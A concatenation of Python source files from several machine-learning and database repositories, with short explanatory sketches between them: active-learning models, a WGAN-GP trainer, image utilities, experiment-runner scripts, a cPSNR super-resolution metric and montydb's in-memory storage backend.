images = images.cuda()
# variables
n_mcmc = active_learning_dict["n_mcmc"]
input_shape = images.size()
batch_size = input_shape[0]
# multiply images with n_mcmc
images_stacked = torch.stack([images] * n_mcmc)
images_stacked = images_stacked.view(batch_size * n_mcmc,
*input_shape[1:])
# compute the logits
logits = self.model_base(images_stacked)
logits = logits.view([n_mcmc, batch_size, *logits.size()[1:]])
probs = F.softmax(logits, dim=2)
return probs
class ClfMonitor:
def __init__(self):
self.wrongs = 0
self.n_samples = 0
def add(self, wrongs):
self.wrongs += wrongs.sum()
self.n_samples += wrongs.shape[0]
def get_avg_score(self):
return {"val_error": (self.wrongs/ self.n_samples)}
# Architectures
# =============
class LeNeT(nn.Module):
def __init__(self):
super().__init__()
nb_filters = 32
nb_conv = 4
self.nb_pool = 2
self.conv1 = nn.Conv2d(1, nb_filters, (nb_conv,nb_conv), padding=0)
self.conv2 = nn.Conv2d(nb_filters, nb_filters, (nb_conv, nb_conv), padding=0)
# self.conv3 = nn.Conv2d(nb_filters, nb_filters*2, (nb_conv, nb_conv), 1)
# self.conv4 = nn.Conv2d(nb_filters*2, nb_filters*2, (nb_conv, nb_conv), 1)
self.dropout1 = nn.Dropout2d(p=0.25)
self.dropout2 = nn.Dropout(p=0.5)
self.fc1 = nn.Linear(3872, 128)
self.fc2 = nn.Linear(128, 10)
def forward(self, x_input):
n,c,h,w = x_input.shape
x = self.conv1(x_input)
x = nn.functional.relu(x)
x = self.conv2(x)
x = nn.functional.relu(x)
x = nn.functional.max_pool2d(x, self.nb_pool, self.nb_pool)
x = self.dropout1(x)
x = x.view(n, -1)
x = self.fc1(x)
x = nn.functional.relu(x)
x = self.dropout2(x)
x = self.fc2(x)
return x
```
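Putting models.py together with the dataset and scoring code, the intended loop alternates training on the labelled set, scoring the pool, and labelling the top-scoring items. A schematic sketch; the module paths, the baal `ActiveLearningDataset` wrapper, and the configuration values are assumptions, and the model code above expects a CUDA device:
```python
from torch.utils.data import DataLoader
from baal.active import ActiveLearningDataset   # assumed import path for baal's pool wrapper
from src.datasets import get_dataset             # assumed module paths within this repo
from src.models import get_model

# Track which examples are labelled vs. still in the unlabelled pool.
active_set = ActiveLearningDataset(get_dataset("mnist_binary", "train", "./data"))
active_set.label_randomly(32)   # seed the labelled set

active_learning_dict = {
    "name": "bald",          # or "entropy" / "random"
    "n_mcmc": 20,            # MC-dropout passes per pool image
    "batch_size_pool": 64,
    "ndata_to_label": 16,
}

model = get_model("clf", {"model": {"base": "lenet"}}).cuda()

for cycle in range(5):
    # 1. Fit on the currently labelled examples.
    model.train_on_loader(DataLoader(active_set, batch_size=32, shuffle=True))
    # 2. Score the unlabelled pool and pick the most informative indices.
    indices = model.get_active_indices(active_set, active_learning_dict)
    # 3. Move those items from the pool into the labelled set.
    active_set.label([int(i) for i in indices])
```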
#### File: src/models/wgan.py
```python
import torch
import torchvision.utils as vutils
import torch.autograd as autograd
import os
import src.utils as ut
from src import models
import tqdm
class WGan(torch.nn.Module):
def __init__(self, netG, netD, optG, optD, device,
image_size, batch_size, lambda_gp, d_iterations):
super().__init__()
self.device = device
self.netG = netG
self.optG = optG
self.netD = netD
self.optD = optD
self.batch_size = batch_size
self.image_size = image_size
self.fixed_noise = torch.randn(self.batch_size, self.netG.nz, 1, 1,
device=self.device)
self.iteration = 0
self.lambda_gp = lambda_gp
self.d_iterations = d_iterations
self.errG = torch.Tensor([0]).to(self.device)
def get_state_dict(self):
state_dict = {'optG': self.optG.state_dict(),
'netG': self.netG.state_dict(),
'optD': self.optD.state_dict(),
'netD': self.netD.state_dict()}
return state_dict
def load_state_dict(self, state_dict):
self.optG.load_state_dict(state_dict['optG'])
self.netG.load_state_dict(state_dict['netG'])
self.optD.load_state_dict(state_dict['optD'])
self.netD.load_state_dict(state_dict['netD'])
def train_on_batch(self, batch):
self.iteration += 1
############################
# (1) Train Discriminator
###########################
self.optD.zero_grad()
real_images = batch[0].to(self.device)
batch_size = real_images.size(0)
real_output = self.netD(real_images)
noise = torch.randn(batch_size, self.netG.nz, 1, 1, device=self.device)
fake_images = self.netG(noise)
fake_output = self.netD(fake_images)
# Gradient penalty
gp = self._compute_gradient_penalty(real_images.detach(),
fake_images.detach())
# Adversarial loss
errD = self._compute_d_loss(real_output, fake_output, gp,
self.lambda_gp)
# TODO: clean this up so you don't compute it twice
emd = torch.mean(real_output) - torch.mean(fake_output)
errD.backward()
self.optD.step()
############################
# (2) Train Generator every d_iterations
###########################
self.optG.zero_grad()
if self.iteration % self.d_iterations == 0:
# Generate a batch of images
fake_images = self.netG(noise)
# Loss measures generator's ability to fool the discriminator
# Train on fake images
fake_output = self.netD(fake_images)
self.errG = self._compute_g_loss(fake_output)
self.errG.backward()
self.optG.step()
return {
'losses': {
'loss_D': errD.item(),
'loss_G': self.errG.item(),
'wasserstein_loss_emd': emd.item()
}
}
@torch.no_grad()
def eval_on_batch(self, batch, savedir, epoch, summary_writer):
self.eval()
images_path = os.path.join(savedir, 'images')
os.makedirs(images_path, exist_ok=True)
fake = self.netG(self.fixed_noise)
fake_save_path = os.path.join(images_path,
'fake_samples_epoch_%04d.png' %
epoch)
vutils.save_image(fake.detach(), fake_save_path,
normalize=True)
def _compute_d_loss(self, real_output, fake_output, gp, lambda_gp):
return -torch.mean(real_output) + torch.mean(fake_output) + \
lambda_gp * gp
def _compute_g_loss(self, fake_output):
return -torch.mean(fake_output)
def _compute_gradient_penalty(self, real_images, fake_images):
"""Calculates the gradient penalty loss for WGAN GP"""
batch_size = real_images.size(0)
# Random weight term for interpolation between real and fake samples
alpha = torch.rand(batch_size, 1, 1, 1).to(self.device)
# Get random interpolation between real and fake samples
interpolates = (alpha * real_images + ((1 - alpha) * fake_images))\
.requires_grad_(True)
d_interpolates = self.netD(interpolates)
fake = torch.ones(batch_size).to(self.device).requires_grad_(False)
# Get gradient w.r.t. interpolates
gradients = autograd.grad(
outputs=d_interpolates,
inputs=interpolates,
grad_outputs=fake,
create_graph=True,
retain_graph=True,
only_inputs=True
)[0]
gradients = gradients.view(gradients.size(0), -1)
gradient_penalty = ((gradients.norm(2, dim=1) - 1) ** 2).mean()
return gradient_penalty
def train_on_loader(self, train_loader):
self.train()
n_batches = len(train_loader)
pbar = tqdm.tqdm(total=n_batches, miniters=max(n_batches/100, 1), ncols=180)
agg_results = {}
for i, batch in enumerate(train_loader):
results = self.train_on_batch(batch)
for loss_name, loss_value in results['losses'].items():
if loss_name in agg_results:
agg_results[loss_name] += loss_value
else:
agg_results[loss_name] = loss_value
# mesg = 'Epoch {}/{}:\t'.format(epoch, num_epochs)
mesg = ''
for name, loss in results['losses'].items():
mesg += '{}: {:.6f} '.format(name, loss)
if 'others' in results:
for name, info in results['others'].items():
mesg += '{}: {:.6f} '.format(name, info)
pbar.update(1)
pbar.set_description(mesg, refresh=False)
pbar.close()
avg_results = {}
for agg_loss_name, agg_loss_value in agg_results.items():
avg_results[agg_loss_name] = agg_loss_value / n_batches
return avg_results
    def val_on_loader(self, test_loader, savedir, epoch):
        batch = next(iter(test_loader))
        # Delegate to eval_on_batch, which saves a grid of generated samples.
        self.eval_on_batch(batch, savedir, epoch, summary_writer=None)
```
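`_compute_gradient_penalty` above implements the WGAN-GP penalty: the critic's gradient norm, evaluated at random interpolations between real and fake samples, is pushed toward 1. A standalone, CPU-runnable sketch of the same computation with a toy critic (the shapes and the critic itself are invented for illustration):
```python
import torch
import torch.autograd as autograd
from torch import nn

# Toy critic over 1x8x8 "images"; purely illustrative.
critic = nn.Sequential(nn.Flatten(), nn.Linear(64, 32), nn.ReLU(), nn.Linear(32, 1))

real = torch.rand(16, 1, 8, 8)
fake = torch.rand(16, 1, 8, 8)

# One interpolation coefficient per example, broadcast over C/H/W.
alpha = torch.rand(real.size(0), 1, 1, 1)
interpolates = (alpha * real + (1 - alpha) * fake).requires_grad_(True)
d_interpolates = critic(interpolates)

# Gradient of the critic output w.r.t. the interpolated inputs.
gradients = autograd.grad(
    outputs=d_interpolates,
    inputs=interpolates,
    grad_outputs=torch.ones_like(d_interpolates),
    create_graph=True,
    retain_graph=True,
    only_inputs=True,
)[0]

# Penalize deviation of each example's gradient norm from 1.
gradients = gradients.view(gradients.size(0), -1)
gradient_penalty = ((gradients.norm(2, dim=1) - 1) ** 2).mean()
print(gradient_penalty.item())
```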
#### File: gans/src/utils.py
```python
import torch
import torchvision
import os
import re
import time
import zipfile
import shutil
import tqdm
import random
from torch.utils.data import sampler
from PIL import Image
from itertools import cycle, islice
# ========================================================
# Dataset-related functions and classes
# ========================================================
def subset_dataset(dataset, size):
data = [dataset[i] for i in range(size)]
class SubsetDataset(torch.nn.Module):
def __init__(self, data, dataset):
self.data = data
self.split = dataset.split
def __getitem__(self, item):
return self.data[item]
def __len__(self):
return len(self.data)
dataset = SubsetDataset(data, dataset)
return dataset
def get_indices(dataset, class_indices):
indices = []
for i in range(len(dataset.targets)):
if dataset.targets[i] in class_indices:
indices.append(i)
return indices
def get_indices_unique(dataset, class_indices):
indices = []
obtained_class_indices = []
for i in range(len(dataset.targets)):
if dataset.targets[i] in class_indices\
and dataset.targets[i] not in obtained_class_indices:
indices.append(i)
obtained_class_indices.append(dataset.targets[i])
return indices
class ConditionalDataset(torch.utils.data.Dataset):
def __init__(self, dataset, shuffle_cond=True):
self.dataset = dataset
self.targets = self.dataset.targets
classes_to_indices = list(range(len(self.dataset.classes)))
self.dataset_class_split = {
classes_to_indices[i]: get_indices(self.dataset,
[classes_to_indices[i]])
for i in classes_to_indices
}
self.shuffle_cond = shuffle_cond
def __getitem__(self, index):
img, target = self.dataset[index]
if self.shuffle_cond:
cond_index = random.choice(self.dataset_class_split[target])
else:
cond_index = index
cond_image, cond_target = self.dataset[cond_index]
return img, target, cond_image, cond_target
def __len__(self):
return len(self.dataset)
# ========================================================
# Image utility functions
# ========================================================
def reformat_image(filename, data):
pass
def reformat_images(images):
pass
def stack_img_list(img_list):
image_list_torch = []
for i in img_list:
if i.ndim == 4:
i = i[0]
if i.max() > 1:
i = i / 255.
image_list_torch += [i]
image_list_torch = torch.stack(image_list_torch)
img = torchvision.utils.make_grid(image_list_torch, nrow=5)
return img
def load_image(filename, size=None, scale=None):
img = Image.open(filename)
if size is not None:
img = img.resize((size, size), Image.ANTIALIAS)
elif scale is not None:
img = img.resize((int(img.size[0] / scale), int(img.size[1] / scale)), Image.ANTIALIAS)
return img
def save_image(filename, data):
img = data.detach().clone().clamp(0, 255).numpy()
img = img.transpose(1, 2, 0).astype('uint8')
img = Image.fromarray(img)
img.save(filename)
def save_images(save_dir, images, epoch=None, batch_id=None, filenames=None):
i = 0
for image in images:
filename = str(i).zfill(8) + '.png'
if epoch is not None and batch_id is not None and filenames is None:
epoch_str = str(epoch).zfill(8)
batch_id_str = str(batch_id).zfill(8)
filename = epoch_str + '_' + batch_id_str + '_' + filename
if filenames is not None:
filename = filenames[i]
save_path = os.path.join(save_dir, filename)
save_image(save_path, image)
i += 1
def gram_matrix(y):
(b, ch, h, w) = y.size()
features = y.view(b, ch, w * h)
features_t = features.transpose(1, 2)
gram = features.bmm(features_t) / (ch * h * w)
return gram
def normalize_batch(batch):
# normalize using imagenet mean and std
mean = batch.new_tensor([0.485, 0.456, 0.406]).view(-1, 1, 1)
std = batch.new_tensor([0.229, 0.224, 0.225]).view(-1, 1, 1)
batch = batch.div(255.0)
return (batch - mean) / std
def unnormalize_batch(batch):
# unnormalize using imagenet mean and std
mean = batch.new_tensor([0.485, 0.456, 0.406]).view(-1, 1, 1)
std = batch.new_tensor([0.229, 0.224, 0.225]).view(-1, 1, 1)
return ((batch * std) + mean) * 255.0
# ========================================================
# Misc.
# ========================================================
def unzip(source_filename, dest_dir):
with zipfile.ZipFile(source_filename) as zf:
zf.extractall(path=dest_dir)
def load_state_dict(fname_model, style_model):
state_dict = torch.load(fname_model)
for k in list(state_dict.keys()):
if re.search(r'in\d+\.running_(mean|var)$', k):
del state_dict[k]
style_model.load_state_dict(state_dict)
style_model.cuda()
return style_model
def rmtree(dir):
shutil.rmtree(dir, ignore_errors=True)
'''
MIT license: http://opensource.org/licenses/MIT
Copyright (c) <2013> <<NAME>>
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
'''
def flatten_list(alist):
'''
No Python hacks in this implementation. Also, this accepts many levels of nested lists.
The limit is in the number of recursive calls.
@alist: A tuple or list.
@return: A flat list with all elements of @alist and its nested lists.
Complexity: `Θ(n)`, where `n` is the number of elements of @alist
plus the number of elements of all nested lists.
'''
new_list = []
for item in alist:
if isinstance(item, (list, tuple)):
new_list.extend(flatten_list(item))
else:
new_list.append(item)
return new_list
def add_hparams(self, hparam_dict, metric_dict, global_step=None):
from torch.utils.tensorboard.summary import hparams
"""Add a set of hyperparameters to be compared in TensorBoard.
Args:
hparam_dict (dictionary): Each key-value pair in the dictionary is the
name of the hyper parameter and it's corresponding value.
metric_dict (dictionary): Each key-value pair in the dictionary is the
name of the metric and it's corresponding value. Note that the key used
here should be unique in the tensorboard record. Otherwise the value
you added by `add_scalar` will be displayed in hparam plugin. In most
cases, this is unwanted.
p.s. The value in the dictionary can be `int`, `float`, `bool`, `str`, or
0-dim tensor
Examples::
from torch.utils.tensorboard import SummaryWriter
with SummaryWriter() as w:
for i in range(5):
w.add_hparams({'lr': 0.1*i, 'bsize': i},
{'hparam/accuracy': 10*i, 'hparam/loss': 10*i})
Expected result:
.. image:: _static/img/tensorboard/add_hparam.png
:scale: 50 %
"""
if type(hparam_dict) is not dict or type(metric_dict) is not dict:
raise TypeError('hparam_dict and metric_dict should be dictionary.')
exp, ssi, sei = hparams(hparam_dict, metric_dict)
self.file_writer.add_summary(exp, global_step)
self.file_writer.add_summary(ssi, global_step)
self.file_writer.add_summary(sei, global_step)
for k, v in metric_dict.items():
self.add_scalar(k, v, global_step)
def roundrobin(*iterables):
"roundrobin('ABC', 'D', 'EF') --> A D E B F C"
# Recipe credited to <NAME>
num_active = len(iterables)
nexts = cycle(iter(it).__next__ for it in iterables)
while num_active:
try:
for next in nexts:
yield next()
except StopIteration:
# Remove the iterator we just exhausted from the cycle.
num_active -= 1
nexts = cycle(islice(nexts, num_active))
```
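Two of the helpers above are easy to sanity-check in isolation: `gram_matrix` (per-image channel correlations, used for style losses) and the `normalize_batch`/`unnormalize_batch` pair, which expect pixel values in the 0-255 range. A short sketch; the import path is an assumption:
```python
import torch
from src.utils import gram_matrix, normalize_batch, unnormalize_batch  # assumed path

batch = torch.rand(2, 3, 32, 32) * 255.0   # fake images in the 0-255 range

# One (channels x channels) Gram matrix per image.
print(gram_matrix(batch).shape)   # torch.Size([2, 3, 3])

# normalize_batch scales to [0, 1] and applies the ImageNet mean/std;
# unnormalize_batch inverts it back to roughly the original 0-255 values.
restored = unnormalize_batch(normalize_batch(batch))
print(torch.allclose(restored, batch, atol=1e-3))   # True up to float error
```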
#### File: examples/gans/trainval.py
```python
import torch
# Standard Python libraries
import os
import argparse
# Others
import exp_configs
import src.datasets as datasets
import src.utils as ut
from src import models
from src import dataloaders
import pandas as pd
# External libraries
import pprint
# Haven
from haven import haven_utils as hu
from haven import haven_results as hr
from haven import haven_chk as hc
from haven import haven_img as hi
def train(exp_dict, savedir_base, reset, compute_fid=False):
# Book keeping
pprint.pprint(exp_dict)
exp_id = hu.hash_dict(exp_dict)
savedir = os.path.join(savedir_base, exp_id)
if reset:
ut.rmtree(savedir)
os.makedirs(savedir, exist_ok=True)
hu.save_json(os.path.join(savedir, 'exp_dict.json'), exp_dict)
print('Experiment saved in %s' % savedir)
device = \
torch.device('cuda:' + exp_dict['gpu'] if torch.cuda.is_available() else 'cpu')
# 1. Load dataset and loader
train_set, test_set, num_channels, num_train_classes, num_test_classes = \
datasets.get_dataset(exp_dict['dataset'],
dataset_path=savedir_base,
image_size=exp_dict['image_size'])
train_loader, test_loader = \
dataloaders.get_dataloader(exp_dict['dataloader'],
train_set, test_set, exp_dict)
# 2. Fetch model to train
model = models.get_model(exp_dict['model'],
num_train_classes, num_test_classes,
num_channels, device, exp_dict)
# 3. Resume experiment or start from scratch
score_list_path = os.path.join(savedir, 'score_list.pkl')
if os.path.exists(score_list_path):
# Resume experiment if it exists
model_path = os.path.join(savedir, 'model_state_dict.pth')
model.load_state_dict(hu.torch_load(model_path))
score_list = hu.load_pkl(score_list_path)
meta_dict_path = os.path.join(savedir, 'meta_dict.pkl')
meta_dict = hu.load_pkl(meta_dict_path)
print('Resuming experiment at episode %d epoch %d' %
(meta_dict['episode'], meta_dict['epoch']))
else:
# Start experiment from scratch
meta_dict = {'episode': 1, 'epoch': 1}
score_list = []
# Remove TensorBoard logs from previous runs
ut.rmtree(os.path.join(savedir, 'tensorboard_logs'))
print('Starting experiment at episode %d epoch %d' %
(meta_dict['episode'], meta_dict['epoch']))
# 4. Train and eval loop
s_epoch = meta_dict['epoch']
for e in range(s_epoch, exp_dict['num_epochs'] + 1):
# 0. Initialize dicts
score_dict = {'epoch': e}
meta_dict['epoch'] = e
# 1. Train on loader
train_dict = model.train_on_loader(train_loader)
# 1b. Compute FID
if compute_fid == 1:
if e % 20 == 0 or e == 1 or e == exp_dict['num_epochs']:
print('Starting FID computation...')
                # `fid` is assumed to come from a metrics helper not shown in this file.
                train_dict['fid'] = fid(model, train_loader.dataset,
                                        train_loader.sampler, savedir)
score_dict.update(train_dict)
# 2. Eval on loader
eval_dict = model.val_on_loader(test_loader, savedir, e)
score_dict.update(eval_dict)
# 3. Report and save model state, optimizer state, and scores
score_list += [score_dict]
score_df = pd.DataFrame(score_list)
print('\n', score_df.tail(), '\n')
if e % 10 == 0:
hu.torch_save(os.path.join(savedir, 'model_state_dict.pth'),
model.get_state_dict())
hu.save_pkl(os.path.join(savedir, 'score_list.pkl'), score_list)
hu.save_pkl(os.path.join(savedir, 'meta_dict.pkl'), meta_dict)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-e', '--exp_group_list', nargs='+')
parser.add_argument('-sb', '--savedir_base', required=True)
parser.add_argument('-r', '--reset', default=0, type=int)
parser.add_argument('-ei', '--exp_id', default=None)
args = parser.parse_args()
# Collect experiments
if args.exp_id is not None:
# Select one experiment
savedir = os.path.join(args.savedir_base, args.exp_id)
exp_dict = hu.load_json(os.path.join(savedir, 'exp_dict.json'))
exp_list = [exp_dict]
else:
# Select exp group
exp_list = []
for exp_group_name in args.exp_group_list:
exp_list += exp_configs.EXP_GROUPS[exp_group_name]
# Launch jobs on compute cluster
if False:
from haven import haven_jobs as hj
run_command = ('python train.py -ei <exp_id> '
'-fid %d -sb %s -u %s -t %s' %
(args.compute_fid, args.savedir_base, args.username,
args.use_tensorboard))
hj.run_exp_list_jobs(
exp_list,
savedir_base=args.savedir_base,
workdir=os.path.dirname(os.path.realpath(__file__)),
run_command=run_command,
job_utils_path=exp_configs.JOB_UTILS_PATH,
job_config=exp_configs.BORGY_CONFIGS[args.username])
# Launch jobs locally
else:
# Run experiments
for exp_dict in exp_list:
train(exp_dict=exp_dict,
savedir_base=args.savedir_base,
reset=args.reset)
```
#### File: examples/minimal/trainval.py
```python
import os
import argparse
import pandas as pd
import pprint
import torch
import exp_configs
import models
import datasets
from haven import haven_utils as hu
from haven import haven_chk as hc
from haven import haven_jobs as hj
def trainval(exp_dict, savedir_base, reset=False):
# bookkeeping
# ---------------
# get experiment directory
exp_id = hu.hash_dict(exp_dict)
savedir = os.path.join(savedir_base, exp_id)
if reset:
# delete and backup experiment
hc.delete_experiment(savedir, backup_flag=True)
# create folder and save the experiment dictionary
os.makedirs(savedir, exist_ok=True)
hu.save_json(os.path.join(savedir, 'exp_dict.json'), exp_dict)
pprint.pprint(exp_dict)
print('Experiment saved in %s' % savedir)
# Dataset
# -----------
# train loader
train_loader = datasets.get_loader(dataset_name=exp_dict['dataset'], datadir=savedir_base,
split='train')
# val loader
val_loader = datasets.get_loader(dataset_name=exp_dict['dataset'], datadir=savedir_base,
split='val')
# Model
# -----------
model = models.get_model(model_name=exp_dict['model'])
# Checkpoint
# -----------
model_path = os.path.join(savedir, 'model.pth')
score_list_path = os.path.join(savedir, 'score_list.pkl')
if os.path.exists(score_list_path):
# resume experiment
model.set_state_dict(hu.torch_load(model_path))
score_list = hu.load_pkl(score_list_path)
s_epoch = score_list[-1]['epoch'] + 1
else:
# restart experiment
score_list = []
s_epoch = 0
# Train & Val
# ------------
print('Starting experiment at epoch %d' % (s_epoch))
for e in range(s_epoch, 10):
score_dict = {}
# Train the model
train_dict = model.train_on_loader(train_loader)
# Validate the model
val_dict = model.val_on_loader(val_loader)
# Get metrics
score_dict['train_loss'] = train_dict['train_loss']
score_dict['val_acc'] = val_dict['val_acc']
score_dict['epoch'] = e
# Add to score_list and save checkpoint
score_list += [score_dict]
# Report & Save
score_df = pd.DataFrame(score_list)
print(score_df.tail())
hu.torch_save(model_path, model.get_state_dict())
hu.save_pkl(score_list_path, score_list)
print('Checkpoint Saved: %s' % savedir)
print('experiment completed')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-e', '--exp_group_list', nargs='+')
parser.add_argument('-sb', '--savedir_base', required=True)
parser.add_argument('-r', '--reset', default=0, type=int)
parser.add_argument('-ei', '--exp_id', default=None)
parser.add_argument('-v', '--view_jupyter', default=None)
parser.add_argument('-j', '--run_jobs', default=None)
args = parser.parse_args()
# Collect experiments
# -------------------
if args.exp_id is not None:
# select one experiment
savedir = os.path.join(args.savedir_base, args.exp_id)
exp_dict = hu.load_json(os.path.join(savedir, 'exp_dict.json'))
exp_list = [exp_dict]
else:
# select exp group
exp_list = []
for exp_group_name in args.exp_group_list:
exp_list += exp_configs.EXP_GROUPS[exp_group_name]
# Run experiments or View them
# ----------------------------
if args.run_jobs:
# launch jobs
from haven import haven_jobs as hj
hj.run_exp_list_jobs(exp_list,
savedir_base=args.savedir_base,
workdir=os.path.dirname(os.path.realpath(__file__)))
else:
# run experiments
for exp_dict in exp_list:
# do trainval
trainval(exp_dict=exp_dict,
savedir_base=args.savedir_base,
reset=args.reset)
``` |
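The script above is driven entirely by `exp_configs.EXP_GROUPS`, a mapping from a group name to a list of experiment dictionaries; each dictionary is hashed by `hu.hash_dict` to name its save directory. A minimal sketch of such a config module, with the matching launch command in a comment (the `dataset`/`model` values and the extra `lr` key are placeholders; they only need to match what `datasets.get_loader` and `models.get_model` accept in this example):
```python
# exp_configs.py -- illustrative only
EXP_GROUPS = {
    # One group name maps to a list of experiment dicts; trainval.py runs each one.
    "mnist": [
        {"dataset": "mnist", "model": "mlp", "lr": lr}
        for lr in (1e-2, 1e-3)
    ],
}

# Launched as, e.g.:
#   python trainval.py -e mnist -sb ./results -r 1
```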
{
"source": "jqueguiner/HighRes-net",
"score": 3
} |
#### File: HighRes-net/src/Evaluator.py
```python
import itertools
import numpy as np
from tqdm import tqdm
from DataLoader import get_patch
def cPSNR(sr, hr, hr_map):
"""
Clear Peak Signal-to-Noise Ratio. The PSNR score, adjusted for brightness and other volatile features, e.g. clouds.
Args:
sr: numpy.ndarray (n, m), super-resolved image
hr: numpy.ndarray (n, m), high-res ground-truth image
hr_map: numpy.ndarray (n, m), status map of high-res image, indicating clear pixels by a value of 1
Returns:
cPSNR: float, score
"""
if len(sr.shape) == 2:
sr = sr[None, ]
hr = hr[None, ]
hr_map = hr_map[None, ]
    if sr.dtype.type is np.uint16:  # integer array is in the range [0, 65535]
sr = sr / np.iinfo(np.uint16).max # normalize in the range [0, 1]
else:
        assert 0 <= sr.min() and sr.max() <= 1, 'sr.dtype must be either uint16 (range 0-65535) or float64 in [0, 1].'
if hr.dtype.type is np.uint16:
hr = hr / np.iinfo(np.uint16).max
n_clear = np.sum(hr_map, axis=(1, 2)) # number of clear pixels in the high-res patch
diff = hr - sr
bias = np.sum(diff * hr_map, axis=(1, 2)) / n_clear # brightness bias
cMSE = np.sum(np.square((diff - bias[:, None, None]) * hr_map), axis=(1, 2)) / n_clear
cPSNR = -10 * np.log10(cMSE) # + 1e-10)
if cPSNR.shape[0] == 1:
cPSNR = cPSNR[0]
return cPSNR
def patch_iterator(img, positions, size):
"""Iterator across square patches of `img` located in `positions`."""
for x, y in positions:
yield get_patch(img=img, x=x, y=y, size=size)
def shift_cPSNR(sr, hr, hr_map, border_w=3):
"""
cPSNR score adjusted for registration errors. Computes the max cPSNR score across shifts of up to `border_w` pixels.
Args:
sr: np.ndarray (n, m), super-resolved image
hr: np.ndarray (n, m), high-res ground-truth image
hr_map: np.ndarray (n, m), high-res status map
border_w: int, width of the trimming border around `hr` and `hr_map`
Returns:
max_cPSNR: float, score of the super-resolved image
"""
size = sr.shape[1] - (2 * border_w) # patch size
sr = get_patch(img=sr, x=border_w, y=border_w, size=size)
pos = list(itertools.product(range(2 * border_w + 1), range(2 * border_w + 1)))
iter_hr = patch_iterator(img=hr, positions=pos, size=size)
iter_hr_map = patch_iterator(img=hr_map, positions=pos, size=size)
site_cPSNR = np.array([cPSNR(sr, hr, hr_map) for hr, hr_map in tqdm(zip(iter_hr, iter_hr_map),
disable=(len(sr.shape) == 2))
])
max_cPSNR = np.max(site_cPSNR, axis=0)
return max_cPSNR
``` |
{
"source": "jqueguiner/montydb",
"score": 3
} |
#### File: montydb/storage/memory.py
```python
from itertools import islice
from collections import OrderedDict
from ..types import bson_ as bson
from . import (
AbstractStorage,
AbstractDatabase,
AbstractCollection,
AbstractCursor,
StorageDuplicateKeyError,
)
_repo = OrderedDict()
_config = {"_": {}}
def is_memory_storage_set():
return bool(_config["_"])
class MemoryStorage(AbstractStorage):
"""
"""
def __init__(self, repository, storage_config):
super(MemoryStorage, self).__init__(repository, storage_config)
self._repo = _repo
@classmethod
def nice_name(cls):
return "memory"
@classmethod
def config(cls, **storage_kwargs):
return storage_kwargs
@classmethod
def save_config(cls, repository, **storage_kwargs):
_config["_"] = storage_kwargs
@classmethod
def launch(cls, repository):
"""Load config from repository and return a storage instance
"""
# Pass to cls.config
storage_config = cls.config(**_config["_"].copy())
# Return an instance
return cls(repository, storage_config)
def database_create(self, db_name):
self._repo[db_name] = OrderedDict()
def database_drop(self, db_name):
if db_name in self._repo:
del self._repo[db_name]
def database_list(self):
return list(self._repo.keys())
class MemoryDatabase(AbstractDatabase):
"""
"""
@property
def _db(self):
return self._storage._repo[self._name]
def db_exists(self):
return self._name in self._storage._repo
def collection_exists(self, col_name):
if self.db_exists():
return col_name in self._db
return False
def collection_create(self, col_name):
if not self.db_exists():
self._storage.database_create(self._name)
self._db[col_name] = OrderedDict()
def collection_drop(self, col_name):
if self.collection_exists(col_name):
del self._db[col_name]
def collection_list(self):
if not self.db_exists():
return []
return list(self._db.keys())
MemoryStorage.contractor_cls = MemoryDatabase
class MemoryCollection(AbstractCollection):
"""
"""
@property
def _col(self):
if not self._col_exists():
self._database.collection_create(self._name)
return self._database._db[self._name]
def _col_exists(self):
return self._database.collection_exists(self._name)
def _id_unique(self, id):
if id in self._col:
raise StorageDuplicateKeyError()
def write_one(self, doc, check_keys=True):
_id = doc["_id"]
b_id = bson.id_encode(_id)
self._id_unique(b_id)
self._col[b_id] = self._encode_doc(doc, check_keys)
return _id
def write_many(self, docs, check_keys=True, ordered=True):
ids = list()
for doc in docs:
_id = doc["_id"]
b_id = bson.id_encode(_id)
self._id_unique(b_id)
self._col[b_id] = self._encode_doc(doc, check_keys)
ids.append(_id)
return ids
def update_one(self, doc):
self._col[bson.id_encode(doc["_id"])] = self._encode_doc(doc)
def update_many(self, docs):
for doc in docs:
self._col[bson.id_encode(doc["_id"])] = self._encode_doc(doc)
def delete_one(self, id):
del self._col[bson.id_encode(id)]
def delete_many(self, ids):
for id in ids:
del self._col[bson.id_encode(id)]
MemoryDatabase.contractor_cls = MemoryCollection
class MemoryCursor(AbstractCursor):
"""
"""
@property
def _col(self):
if self._collection._col_exists():
return self._collection._col
return OrderedDict()
def query(self, max_scan):
docs = (self._decode_doc(doc) for doc in self._col.values())
if not max_scan:
return docs
else:
return islice(docs, max_scan)
MemoryCollection.contractor_cls = MemoryCursor
```
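The classes above are wired together through `contractor_cls` (storage → database → collection → cursor) and keep every document BSON-encoded in the module-level `_repo` dict. They are normally driven through montydb's pymongo-like client rather than instantiated directly; a short sketch using the public entry points (treat the exact `set_storage` arguments as an assumption based on montydb's docs):
```python
from montydb import MontyClient, set_storage

# Select the in-memory backend; ":memory:" is the conventional repository name
# for it, and nothing is written to disk.
set_storage(":memory:", storage="memory")
client = MontyClient(":memory:")

col = client.db.test
col.insert_many([{"x": 1}, {"x": 2}, {"x": 3}])
print(col.count_documents({"x": {"$gt": 1}}))              # 2
print([doc["x"] for doc in col.find({"x": {"$gt": 1}})])   # [2, 3]
```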
#### File: montydb/types/bson_.py
```python
import sys
bson_used = None
SON = None
BSON = None
ObjectId = None
Timestamp = None
MinKey = None
MaxKey = None
Int64 = None
Decimal128 = None
Binary = None
Regex = None
Code = None
RawBSONDocument = None
CodecOptions = None
